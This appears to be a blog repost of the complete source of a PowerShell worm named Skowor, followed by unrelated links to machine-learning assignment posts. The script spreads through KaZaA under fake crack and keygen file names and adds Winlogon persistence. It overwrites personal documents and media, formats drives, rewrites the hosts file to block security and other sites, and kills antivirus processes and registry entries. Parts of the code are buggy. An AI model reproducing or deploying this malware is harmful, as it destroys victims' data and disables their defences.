PowerShell worm Skowor

PowerShell worm Skowor

http://www.megapanzer.com/2009/12/11/powershell-worm-skowor/

Source:

# sk0r alias Czybik's Powershell Skript Worm 
# 
# This worm is for the PowerShell Script Interpreter
# which is included with Microsoft Windows Vista
# 
# This worm is ?006 by sk0r alias Czybik
# 
# Visit my homepages: www.sk0r-scripts.tk & www.sk0r-virii.tk & www.czybik-kit.tk
# 
# This worm has following features:
# 
# - Spreads with P2P (KaZaA Lite) per JScript
# - Writes a registry string to run every time windows starts
# - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
# - overwrites specific files in Eigene Dateien Folder and Subfolders
# - formating all insertet drives and discettes
# - deletes files in %system32%\drivers\etc
# - overwrites the host file in %system32%\drivers\etc
# - kills some well-known Anti-Virus processes
# - deletes Reg-Values from well-known Antiviruses
# - tells a message to user, with informations about the worm
# 
# 
# Informations:
# 
# This worm is a proof of concept worm. Because of it is able
# to run Powershell on Windows XP, too (Need .Net Framework 2.0)
# this worm is dedicated to Windows XP. Well, yes, it runs on
# Windows Vista, too. But I don't know if the structures are the
# same as in windows Xp. Note that this worm uses ActiveX Objects.
# In this worm I use Scripting.FileSystemObject and WScript.Shell 
# Object. I hope Vista will include those ActiveX Objects, too.
# I am happy to be the coder of this worm. I like this language.
# And I am looking forward to new Malware in PowerShell.
# Now I will release more and more worms in this language.
#
# This worm is ?006 by sk0r alias Czybik. To tell me anything
# write me an email @ sk0r1337@gmx.de or a pm at vx.netlux.org
# 
# ======================================================================

$fso = New-Object -Com Scripting.FileSystemObject ;
$wshs = New-Object -Com WScript.Shell ;
$windir = $fso.GetSpecialFolder(0)
$sysdir = $fso.GetSpecialFolder(1)

$strInfoString_one = "This is a PowerShell Script worm. ";
$strInfoString_two = "This worm is proof-of-concept ";
$strInfoString_three = "the worm is ?006 by sk0r alias Czybik ";
$strInfoString_four = "for informations write an email @ sk0r1337@gmx.de ";


$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir'); 
$AllMshDateinCurDir = get-childitem *.msh
foreach ($PowerShellScript in $AllMshDateinCurDir)
{
  if ($PowerShellScript.Length=13035)
  {
    $MySelfWorm = $PowerShellScript.Name;
  }
}
$gtFilesMsh = $fso.getfile($MySelfWorm);
if (!$fso.fileexists($Sysdir.Path\WinCzySko.msh) 
{
    $gtFilesMsh.Copy($Sysdir.Path\WinCzySko.msh); 
}
$gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh"); 
$gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh"); 
$gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh"); 
$gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh"); 
$gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh"); 
$gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh"); 
$gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh"); 
$gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
$gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
$gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"); 
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0rCzybik","REG_SZ"); 
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by sk0r alias Czybik","REG_SZ"); 
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinCzySko.msh" ,"REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.sk0r-scripts.tk")


$PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
UeberschreibeDateien($PersonalDirectory)

function UeberschreibeDateien($strOrdner)
{
    $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
    $StringToOverwrite += "This Worm is ?006 by sk0r alias Czybik! ";
    
    $OverWrtOwnFiles = $fso.getfolder($strOrdner)
    $OverFiles = $OverWrtOwnFiles.Files
    $TheSubFldr = $OverWrtOwnFiles.subfolders
    
    foreach ($SubFiles in $TheSubFldr.Files)
    {
        $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
        if ($strGetExt="JPG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="BMP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="GIF")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PNG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="JPEG")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="AVI")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="MP3")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="WMV")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="WMA")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="DOC")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="XLS")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="RTF")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PPS")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="PPT")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="ZIP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="RAR")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
        
        if ($strGetExt="CPP")
        {
            del $AlleDateien.Path ;
            echo "$StringToOverwrite" >> $AlleDateien.Path
        }
    }
    
    foreach ($NochMehrUnterOrdner in $TheSubFldr)
    {
        UeberschreibeDateien($NochMehrUnterOrdner)
    }

}

$TheDrives = $fso.Drives
foreach ($AllDrives in $TheDrives)
    {
    if ($AllDrives.DriveType=1)
    {
        format $AllDrives.Path /y
    }
    if ($AllDrives.DriveType=2)
    {
        format $AllDrives.Path /y
    }
}


cd "$sysdir.path\Drivers\etc";
del "networks";
del "protocol";
del "services";
del "hosts";
del "hosts.bak";
echo "# Host File overwritten by Ps Worm " >> hosts
echo "# This file disallows you to visit av and dl sites :> " >> hosts
echo " " >> hosts
echo "127.0.0.1 www.antivir.de " >> hosts
echo "127.0.0.1 www.bitdefender.de " >> hosts
echo "127.0.0.1 www.znet.de " >> hosts
echo "127.0.0.1 www.chip.de " >> hosts
echo "127.0.0.1 www.virustotal.com " >> hosts
echo "127.0.0.1 virusscan.jotti.org " >> hosts
echo "127.0.0.1 www.kaspersky.com " >> hosts
echo "127.0.0.1 www.sophos.de " >> hosts
echo "127.0.0.1 www.trojaner-info.de " >> hosts
echo "127.0.0.1 www.trojaner-help.de " >> hosts
echo "127.0.0.1 www.arcabit.com " >> hosts
echo "127.0.0.1 www.avast.com " >> hosts
echo "127.0.0.1 www.grisoft.com " >> hosts
echo "127.0.0.1 www.bitdefender.com " >> hosts
echo "127.0.0.1 www.clamav.net " >> hosts
echo "127.0.0.1 www.drweb.com " >> hosts
echo "127.0.0.1 www.f-prot.com " >> hosts)
echo "127.0.0.1 www.google.de " >> hosts
echo "127.0.0.1 www.fortinet.com " >> hosts
echo "127.0.0.1 www.nod32.com " >> hosts
echo "127.0.0.1 www.norman.com " >> hosts
echo "127.0.0.1 www.microsoft.com " >> hosts
echo "127.0.0.1 www.anti-virus.by/en " >> hosts
echo "127.0.0.1 www.symantec.com " >> hosts
echo "127.0.0.1 www.windowsupdate.com " >> hosts
echo "127.0.0.1 www.trendmicro.com " >> hosts
echo "127.0.0.1 www.mcafee.com " >> hosts
echo "127.0.0.1 www.viruslist.com " >> hosts
echo "127.0.0.1 www.avp.com " >> hosts
echo "127.0.0.1 www.zonelabs.com " >> hosts
echo "127.0.0.1 www.heise.de " >> hosts
echo "127.0.0.1 www.antivirus-online.de " >> hosts
echo "127.0.0.1 www.free-av.com " >> hosts
echo "127.0.0.1 www.panda-software.com " >> hosts
echo "127.0.0.1 www.pc-welt.de " >> hosts
echo "127.0.0.1 www.pc-special.net " >> hosts
echo "127.0.0.1 download.freenet.de " >> hosts
echo "127.0.0.1 www.vollversion.de " >> hosts
echo "127.0.0.1 www.das-download-archiv.de " >> hosts
echo "127.0.0.1 www.freeware.de " >> hosts
echo "127.0.0.1 www.antiviruslab.com " >> hosts
echo "127.0.0.1 www.search.yahoo.com " >> hosts
echo "127.0.0.1 www.web.de " >> hosts
echo "127.0.0.1 www.hotmail.com " >> hosts
echo "127.0.0.1 www.hotmail.de " >> hosts
echo "127.0.0.1 www.gmx.net " >> hosts
echo "127.0.0.1 www.spiegel.de " >> hosts
echo "127.0.0.1 www.icq.com " >> hosts
echo "127.0.0.1 www.icq.de " >> hosts
echo "127.0.0.1 www.ffh.de " >> hosts
echo "127.0.0.1 www.lavasoft.de " >> hosts
echo "127.0.0.1 www.de.wikipedia.org " >> hosts
echo "127.0.0.1 www.wikipedia.org " >> hosts
echo "127.0.0.1 www.en.wikipedia.org " >> hosts
echo "127.0.0.1 www.wissen.de " >> hosts
echo "127.0.0.1 www.virus-aktuell.de " >> hosts
echo "127.0.0.1 www.arcor.de " >> hosts
echo "127.0.0.1 www.t-online.de " >> hosts
echo "127.0.0.1 www.t-com.de " >> hosts
echo "127.0.0.1 www.alice-dsl.de " >> hosts
echo "127.0.0.1 www.freenet.de " >> hosts
echo "127.0.0.1 www.1und1.de " >> hosts
echo "127.0.0.1 www.fbi.gov " >> hosts
echo "127.0.0.1 www.polizei.de " >> hosts



$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT');  
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online'); 
$wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask'); 
    
    
tskill avcenter /a
tskill avconfig /a
tskill avscan /a
tskill avguard /a
tskill avgnt /a
tskill update /a
tskill preupd /a
tskill avcmd /a
tskill avesvc /a
tskill kav /a
tskill kavsvc /a
tskill kavsend /a
tskill keymanager /a
tskill agentsvr /a
tskill avgcc /a
tskill avgupsvc /a
tskill avgamsvr /a
tskill vsserv /a
tskill bdss /a
tskill xcommsvr /a
tskill bdnagent /a
tskill bdoesrv /a
tskill bdmcon /a
tskill bdswitch /a
tskill rtvr /a
tskill bdsubmit /a
tskill bdlite /a
tskill agentsvr /a
tskill tmproxy /a
tskill PcCtlCom /a
tskill pccguide /a
tskill qttask /a
tskill patch /a
tskill Tmntsrv /a
tskill PccPrm /a
tskill DrWebUpW /a
tskill spidernt /a
tskill DrWebScd /a
tskill DrWeb32w /a
tskill drwadins /a
tskill mcupdui /a
tskill McTskshd /a
tskill McAppIns /a
tskill mghtml /a
tskill McShield /a
tskill Mcdetect /a
tskill McVSEscn /a
tskill oasclnt /a
tskill mcvsshld /a


echo "$strInfoString_one ";
echo "$strInfoString_two ";
echo "$strInfoString_three ";
echo "$strInfoString_four ";

$wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk - 
www.czybik-kit.tk | Worm ?006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik");

exit ;
Read More

Standord Machine Learning Class: Week7 Assignment

## ex6.m> you will be using support vector machines (SVMs) with various example 2D datasets.- Plot Data (in ex6data1.mat)![ex6_plotting_e...… Continue reading

Standord Machine Learning Class: Week6 Assignment

Published on November 15, 2015

Standord Machine Learning Class: Week5 Assignment

Published on November 08, 2015